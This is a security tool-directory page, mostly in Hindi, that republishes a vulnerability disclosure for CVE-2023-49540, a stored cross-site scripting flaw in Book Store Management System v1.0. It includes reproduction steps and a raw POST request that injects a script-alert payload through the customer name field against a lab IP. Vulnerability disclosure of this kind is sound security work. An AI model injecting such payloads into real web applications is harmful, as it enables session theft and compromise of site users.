Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49540 — पुस्तक भंडार प्रबंधन प्रणाली v1.0 - Cross-site scripting (XSS) vulnerability in /index.php/history - कमजोर फ़ील्ड: "ग्राहक का नाम" | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49540
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubgeraldoalcantara/cve-2023-49540

CVE-2023-49540

पुस्तक भंडार प्रबंधन प्रणाली v1.0 - Cross-site scripting (XSS) vulnerability in /index.php/history - कमजोर फ़ील्ड: "ग्राहक का नाम"

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49540

Book Store Management System v1.0 - क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी /index.php/history में - कमजोर फ़ील्ड: "Customer's Name".

विवरण: बुक स्टोर प्रबंधन प्रणाली v1.0 में /bsms_ci/index.php/history पर एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी पाई गई। पेलोड को /bsms_ci/index.php/transaction पृष्ठ पर 'Customer's Name' फ़ील्ड में डाला जाता है। जब हम /bsms_ci/index.php/history पृष्ठ की जाँच करते हैं, तो हमारा पेलोड सफलतापूर्वक इंजेक्ट हो जाता है और कार्यशील होता है।

कमजोर उत्पाद संस्करण: बुक स्टोर प्रबंधन प्रणाली v1.0
CVE लेखक: गेराल्डो अल्कांतारा
दिनांक: 29/11/2023
पुष्टि की गई: 15/12/2023
CVE: CVE-2023-49540
परीक्षण किया गया: विंडोज पर

पुनरुत्पादन के चरण:

इसका शोषण करने के लिए, पेलोड को "/bsms_ci/index.php/transaction" पृष्ठ पर 'Customer's Name' फ़ील्ड में डाला जाता है। "/bsms_ci/index.php/history" पृष्ठ पर सत्यापन करने पर, यह पुष्टि होती है कि पेलोड सफलतापूर्वक इंजेक्ट किया गया है और कार्यशील है।

अनुरोध:

root@kitploit:~
POST /bsms_ci/index.php/transaction/save HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/bsms_ci/index.php/transaction
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; ci_session=5e3p7a2j4a65ocjof08v80jugf17i5cd
Upgrade-Insecure-Requests: 1

user_code=2&buyer_name=1200%3cscript%3ealert(1)%3c%2fscript%3e&total=0&pay=Pay

खोजकर्ता/श्रेय:
गेराल्डो अल्कांतारा

टूल डाउनलोड करें